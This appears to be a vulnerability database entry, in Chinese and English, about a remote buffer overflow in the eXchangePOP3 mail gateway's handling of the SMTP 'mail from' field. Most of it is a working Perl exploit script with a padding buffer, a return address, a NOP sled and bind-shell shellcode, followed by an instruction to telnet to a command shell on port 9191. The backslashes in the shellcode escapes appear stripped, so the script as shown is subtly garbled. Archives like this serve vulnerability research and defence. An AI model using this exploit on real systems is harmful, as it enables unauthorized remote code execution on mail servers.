https://www.exploit-db.com/exploits/24028
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200404-076

eXchangePOP3是一款使用POP3或IMAP协议从Internet邮箱下载信息的系统。eXchangePOP3对部分邮件字段消息缺少正确的缓冲区边界检查，远程攻击者利用这个漏洞对系统进行缓冲区溢出攻击，可能以进程权限执行任意指令。提交包含超长字符串的”MailFrom:”字段的邮件给eXchangePOP3处理，可发生缓冲区溢出，精心构建提交数据可能以进程权限执行任意指令。

source: http://www.securityfocus.com/bid/10180/info

It has been reported that Exchange POP3 e-mail gateway is prone to a remote buffer overflow vulnerability that may allow an attacker to execute arbitrary code on a vulnerable system. This issue could allow an attacker to gain unauthorized access in the context of the affected process.

#!/usr/bin/perl -w

#Exchange pop3 Remote Exploit
#eXchange POP3 is a gateway (connector) that downloads messages from Internet mailboxes
#using the POP3 or IMAP protocol. It then determines the proper recipient(s) for each message
#and sends them to Exchange Server using the SMTP protocol.
#eXchange POP3 can also receive Internet-bound messages from Exchange Server and relay them to
#the Internet. (www.exchangepop3.com )
#by sending a buffer 1025 byte we have:
#telnet target 25
#220 xwcf ESMTP
#mail from:<< "A"x1019  server is down
#registres:
#eax=00000000  ebx=00000000 ecx=61616161 edx=77f733b4
#esi=00000000  edi=00000000   esp=01ebf0d0 ebp=01ebf0f0
#eip=61616161
# the other problem lies in the fact that esp does not point at the beginning of our buffer,
# I chose another  approach, and to seek in another zone memory.
# the ret address can be modified as well as the size of the buffer by using windbg.
# the exploit was tested on xp sp1 win2000 by using different shellcodes, the size of shellcode
# does not have any effect, for the nop 528999 is the minimal size which I could find to fall on ret
# address, you can also modify this value...
# this exploit is used for test only and I am not to in no case responsible for what you can do.
#greez: simo,abder,marocit,#crack.fr

use Net::SMTP;
$remote=$ARGV[0];
$buffer = "A"x1015;
$ret ="x80x1dxdcx02";# Another memory zone
$nop ="x90"x1999999;
$shellcode =          "xEBx03x5DxEBx05xE8xF8xFFxFFxFFx8BxC5x83xC0x11x33".
                      "xC9x66xB9xC9x01x80x30x88x40xE2xFAxDDx03x64x03x7C".
                      "x09x64x08x88x88x88x60xC4x89x88x88x01xCEx74x77xFE".
                      "x74xE0x06xC6x86x64x60xD9x89x88x88x01xCEx4ExE0xBB".
                      "xBAx88x88xE0xFFxFBxBAxD7xDCx77xDEx4Ex01xCEx70x77".
                      "xFEx74xE0x25x51x8Dx46x60xB8x89x88x88x01xCEx5Ax77".
                      "xFEx74xE0xFAx76x3Bx9Ex60xA8x89x88x88x01xCEx46x77".
                      "xFEx74xE0x67x46x68xE8x60x98x89x88x88x01xCEx42x77".
                      "xFEx70xE0x43x65x74xB3x60x88x89x88x88x01xCEx7Cx77".
                      "xFEx70xE0x51x81x7Dx25x60x78x88x88x88x01xCEx78x77".
                      "xFEx70xE0x2Cx92xF8x4Fx60x68x88x88x88x01xCEx64x77".
                      "xFEx70xE0x2Cx25xA6x61x60x58x88x88x88x01xCEx60x77".
                      "xFEx70xE0x6DxC1x0ExC1x60x48x88x88x88x01xCEx6Ax77".
                      "xFEx70xE0x6FxF1x4ExF1x60x38x88x88x88x01xCEx5ExBB".
                      "x77x09x64x7Cx89x88x88xDCxE0x89x89x88x88x77xDEx7C".
                      "xD8xD8xD8xD8xC8xD8xC8xD8x77xDEx78x03x50xDFxDFxE0".
                      "x8Ax88xABx6Fx03x44xE2x9ExD9xDBx77xDEx64xDFxDBx77".
                      "xDEx60xBBx77xDFxD9xDBx77xDEx6Ax03x58x01xCEx36xE0".
                      "xEBxE5xECx88x01xEEx4Ax0Bx4Cx24x05xB4xACxBBx48xBB".
                      "x41x08x49x9Dx23x6Ax75x4ExCCxACx98xCCx76xCCxACxB5".
                      "x01xDCxACxC0x01xDCxACxC4x01xDCxACxD8x05xCCxACx98".
                      "xDCxD8xD9xD9xD9xC9xD9xC1xD9xD9x77xFEx4AxD9x77xDE".
                      "x46x03x44xE2x77x77xB9x77xDEx5Ax03x40x77xFEx36x77".
                      "xDEx5Ex63x16x77xDEx9CxDExECx29xB8x88x88x88x03xC8".
                      "x84x03xF8x94x25x03xC8x80xD6x4Ax8Cx88xDBxDDxDExDF".
                      "x03xE4xACx90x03xCDxB4x03xDCx8DxF0x8Bx5Dx03xC2x90".
                      "x03xD2xA8x8Bx55x6BxBAxC1x03xBCx03x8Bx7DxBBx77x74".
                      "xBBx48x24xB2x4CxFCx8Fx49x47x85x8Bx70x63x7AxB3xF4".
                      "xACx9CxFDx69x03xD2xACx8Bx55xEEx03x84xC3x03xD2x94".
                      "x8Bx55x03x8Cx03x8Bx4Dx63x8AxBBx48x03x5DxD7xD6xD5".
                      "xD3x4Ax8Cx88";
if (not $ARGV[0]) {
        print qq~
        Usage: Exch.pl <host>
        ~;
        exit;}
print "+++++++++++++++++++++++nn";
        print "Exchange pop3 exploit nn";
        print "Discovered by securma massine nn";
        print "[email protected] nn";
        print "+++++++++++++++++++++++nn";

$smtp = Net::SMTP->new($remote);
$smtp->mail($buffer . $ret . $nop . $shellcode);
print "nNow telnet to your cmd shell port 9191 n";

来源:BID
名称:10180
链接:http://www.securityfocus.com/bid/10180
来源:SECUNIA
名称:11449
链接:http://secunia.com/advisories/11449
来源:XF
名称:exchange-pop3-smtp-bo(15922)
链接:http://xforce.iss.net/xforce/xfdb/15922
来源:SECTRACK
名称:1009882
链接:http://securitytracker.com/id?1009882
来源:BUGTRAQ
名称:20040527Re:Exchangepop3remoteexploit
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=108568462428096&w;=2
来源:BUGTRAQ
名称:20040419Exchangepop3remoteexploit
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=108247921402458&w;=2
来源:OSVDB
名称:5593
链接:http://www.osvdb.org/5593